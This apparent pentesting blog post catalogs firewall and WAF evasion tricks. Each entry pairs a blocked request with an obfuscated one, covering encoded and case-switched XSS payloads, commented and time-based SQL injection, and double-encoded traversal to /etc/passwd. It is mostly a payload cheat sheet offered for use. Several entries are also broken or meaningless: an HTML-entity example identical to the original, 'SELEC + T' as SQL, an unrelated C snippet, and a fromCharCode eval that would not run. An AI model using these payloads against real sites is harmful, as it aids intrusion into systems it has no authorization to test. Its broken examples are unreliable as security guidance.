Networking
cybersecurity
pentesting
firewall
The following is a list of very specific hacking techniques you can use to work around (evade) firewalls, keep in mind that there are about a dozen types of firewalls and these techniques work with a portion of them.
Here’s a detailed explanation for each technique, including how to do it, a basic blocked request, and an updated request that may bypass the WAF:
How to do it:
Encode special characters in the payload using URL encoding (percent-encoding) to bypass WAF detection.
Blocked original request:
1<script>alert('XSS')</script>
Updated with URL encoding:
1%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
How to do it:
Convert characters in the payload to their Unicode equivalents to evade detection.
Blocked original request:
1<script>alert('XSS')</script>
Updated with Unicode encoding:
1\u003Cscript\u003Ealert('XSS')\u003C/script\u003E
How to do it:
Use HTML entities to encode characters in the payload, which may render correctly in the browser but evade the WAF.
Blocked original request:
1<script>alert('XSS')</script>
Updated with HTML entities:
1<script>alert('XSS')</script>
How to do it:
Combine multiple encoding techniques (e.g., URL encoding and HTML entities) in a single payload to confuse the WAF.
Blocked original request:
1<script>alert('XSS')</script>
Updated with mixed encoding:
1%3Cscript%3Ealert%28%26%2339%3BXSS%26%2339%3B%29%3C%2Fscript%3E
How to do it:
Combine uppercase and lowercase characters to create efficient payloads.
Blocked original request:
1<script>confirm()</script>
Updated with case-switching:
1<ScrIpT>confirm()</sCRiPt>
How to do it:
Insert comments or extraneous characters within the payload to break up the patterns the WAF is looking for.
Blocked original request:
1SELECT * FROM users WHERE id=1;
Updated with comments:
1SELECT/*comment*/ * FROM users WHERE id=1;
How to do it:
Send multiple parameters with the same name in a single request to confuse the WAF or web application.
Blocked original request:
1GET /search?q=malicious_query
Updated with parameter pollution:
1GET /search?q=benign_query&q=malicious_query
How to do it:
Use double encoding to bypass WAF rules that only check for single-encoded sequences.
Blocked original request:
1GET /../../etc/passwd
Updated with double encoding:
1GET /%252e%252e%252f%252e%252e%252fetc%252fpasswd
How to do it:
Modify the User-Agent or Referrer header to bypass WAF rules that may apply different rules based on these headers.
Blocked original request:
1GET /admin HTTP/1.1 2User-Agent: NormalBrowser
Updated with a custom User-Agent:
1GET /admin HTTP/1.1 2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
How to do it:
Use time delays in SQL injection to infer information from the database without directly retrieving data.
Blocked original request:
1GET /search?q=' OR 1=1; --
Updated with time-based SQL injection:
1GET /search?q='; IF (1=1) WAITFOR DELAY '00:00:05'; --
How to do it:
Modify parameters in HTTP requests, particularly POST requests, to bypass WAF rules focused on GET requests.
Blocked original request:
1POST /login HTTP/1.1 2username=admin&password=123456
Updated with parameter tampering:
1POST /login HTTP/1.1 2username=admin&password=wrong_password
How to do it:
Split the payload across multiple requests or packets to avoid detection by the WAF.
Blocked original request:
1<script>alert('XSS')</script>
Updated with payload fragmentation:
1<script>aler 2t('XSS')</script>
How to do it:
Analyze WAF logs and responses to identify which payloads are being blocked and adjust accordingly.
Blocked original request:
1GET /admin HTTP/1.1
Updated based on log analysis:
1GET /admin.php HTTP/1.1
How to do it:
Use wildcard characters in a way that confuses the WAF's pattern matching.
Blocked original request:
1SELECT * FROM users WHERE username='admin';
Updated with wildcard obfuscation:
1SELECT * FROM users WHERE username LIKE 'adm%';
How to do it:
Insert characters or elements that break the tokens the WAF uses to identify malicious patterns.
Blocked original request:
1SELECT * FROM users WHERE id=1;
Updated with token breaking:
1SELEC + T * FROM users WHERE id=1;
How to do it:
Insert tabs (\t
) or line feeds (\n
) within payloads to disrupt the pattern matching of the WAF.
Blocked original request:
1<script>alert('XSS')</script>
Updated with tabs and line feeds:
1<script>\n\talert('XSS')</script>
How to do it:
Use uninitialized or rarely used variables in the payload to confuse the WAF’s detection algorithms.
Blocked original request:
1int x = 1; return x;
Updated with uninitialized variable:
1int x; return x = 1;
How to do it:
Introduce newline characters within a payload to break up malicious patterns the WAF is scanning for.
Blocked original request:
1<script>alert('XSS')</script>
Updated with newline characters:
1<script> 2alert('XSS') 3</script>
How to do it:
Insert random or irrelevant characters into the payload that the target application will ignore, but which might cause the WAF to overlook the attack.
Blocked original request:
1<script>alert('XSS')</script>
Updated with junk characters:
1<scri%00pt>alert('XSS')</scri%00pt>
How to do it:
Generate payloads dynamically, so they change on each request, making it difficult for the WAF to recognize and block them.
Blocked original request:
1<script>alert('XSS')</script>
Updated with dynamic payload generation:
1<script>eval(String.fromCharCode(97,108,101,114,116)('XSS'))</script>
The firewall evasion techniques we discussed generally aim to bypass specific types of firewalls, particularly those that perform deep packet inspection or application-level filtering, like Web Application Firewalls (WAFs) and Next-Generation Firewalls (NGFWs). However, the effectiveness of these techniques can vary depending on the type of firewall, its configuration, and its specific capabilities. Here's how these techniques might interact with different types of firewalls:
Not all techniques are universally effective across all firewall types. Their success largely depends on the specific type of firewall, its configuration, and the nature of the traffic it inspects. Some techniques are more suited for application-layer firewalls like WAFs, while others might target simpler firewalls that filter at the network layer. Understanding the specific capabilities and configurations of the firewall in question is essential when applying evasion techniques.